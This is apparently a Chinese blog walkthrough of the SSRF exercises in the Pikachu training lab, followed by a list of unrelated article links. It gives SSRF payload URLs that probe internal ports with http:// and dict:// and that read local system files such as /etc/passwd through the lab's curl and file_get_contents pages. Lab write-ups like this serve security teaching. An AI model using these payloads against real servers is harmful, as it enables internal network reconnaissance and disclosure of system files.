当前位置：首页 > news >正文

pikachu_ssrf攻略

news 2025/7/2 9:04:25

ssrf（curl）：

打开pikachu靶场：

http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php

发现URL地址最后面是info1.php 猜测一下有没有可能存在info2.php?

尝试修改访问地址：

因为curl支持很多协议（http，file想，dict等），尝试访问一下：

文件访问（http）

比如说修改url为：?url=http://www.baidu.com，访问百度页面?url=http://www.baidu.com/robots.txt，访问百度文件等

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

端口扫描（http，dict）

使用dict协议可以获取内网主机开放端口相应服务的指纹信息，比如说主机开了http端口

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

读取本地文件（file）

修改url为：?url=file:///etc/passwd，查看文件的内容：

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

ssrf（file_get_content）

首先了解什么是file_get_content的使用：

file_get_contents() 把整个文件读入一个字符串中。
语法：file_get_contents(path,include_path,context,start,max_length)

进行协议测试：

文件读取

读取本地信息?file=file:///c:/1.txt

http协议请求内网资源

?file=http://127.0.0.1/ssrf/ssrf_curl.php读取文件内容

查看全文

http://www.lryc.cn/news/288322.html

门面模式 Facade Pattern

Linux基础指令大汇总

Unity配置表xlsx/xls打包后读取错误问题

CSS基本知识总结

3dmax效果图渲染出现曝光怎么解决？

科技、文化与旅游的融合创新：智慧文旅的未来之路

【第四天】蓝桥杯备战

计算机服务器中了halo勒索病毒怎么办，halo勒索病毒解密处理流程

基于LSTM的负荷预测，基于BILSTM的负荷预测，基于GRU的负荷预测，基于BIGRU的负荷预测，基于BP神经网络的负荷预测

Linux命令-apachectl命令（Apache服务器前端控制工具）

5.【SpringBoot3】文件上传

网络安全态势感知平台概述

PHP导出csv文件格式(最快捷的方式导出Excel文件)

vue3常用代码

【技术】SpringBoot 接口怎么加密解密

SqlAlchemy使用教程(六) -- ORM 表间关系的定义与CRUD操作

嵌入式培训机构四个月实训课程笔记（完整版）-Linux ARM平台编程第五天-kernel配置（物联技术666）

Java笔记(死锁、线程通信、单例模式)

DAY11_(简易版)VUEElement综合案例

【Kafka】开发实战和Springboot集成kafka

【C语言】（1）初识C语言

SpringCloudStream整合MQ（待完善）

【Java 数据结构】包装类简单认识泛型

第139期做大还是做小-Oracle名称哪些事（20240125）

驱动开发--多路复用-信号

LeetCode 2859. 计算 K 置位下标对应元素的和【位操作】1000

composer安装hyperf后，nginx配置hyperf

Flink对接Kafka的topic数据消费offset设置参数

TryHackMe-Umbrella

Excel导出警告：文件格式和拓展名不匹配